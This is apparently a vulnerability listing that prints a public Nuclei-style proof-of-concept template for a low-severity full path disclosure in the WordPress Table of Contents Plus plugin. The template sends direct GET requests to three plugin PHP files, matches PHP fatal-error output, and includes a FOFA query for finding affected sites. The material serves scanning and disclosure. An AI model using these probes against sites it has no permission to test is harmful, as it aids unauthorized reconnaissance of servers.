漏洞描述
WordPress Table of Contents Plus plugin is vulnerable to full path disclosure via direct access to plugin files.
wp-table-of-contents-plus-fpd: WordPress Table of Contents Plus - Full Path Disclosure
PoC代码[已公开]
id: wp-table-of-contents-plus-fpd
info:
name: WordPress Table of Contents Plus - Full Path Disclosure
author: ritikchaddha
severity: low
description: |
WordPress Table of Contents Plus plugin is vulnerable to full path disclosure via direct access to plugin files.
reference:
- https://wordpress.org/plugins/table-of-contents-plus/
metadata:
verified: true
max-request: 3
vendor: developer
product: table-of-contents-plus
framework: wordpress
fofa-query: body="/wp-content/plugins/table-of-contents-plus/"
tags: wp,wordpress,wp-plugin,fpd,toc,exposure
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/includes/class.toc.php"
- "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/admin/class.admin.php"
- "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/front.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Fatal error"
- "table-of-contents-plus"
- "Uncaught Error:"
condition: and
- type: status
status:
- 200
# digest: 490a004630440220732cc93656f2106629f28ff01f201b8eca5cef9c0a563e790ff1862957cca29b022073d9ded4a14e6725b67a7dd46e12e8f32a1766c8b6fcdef392b4850b678bd51b:922c64590222798bb761d5b6d8e72950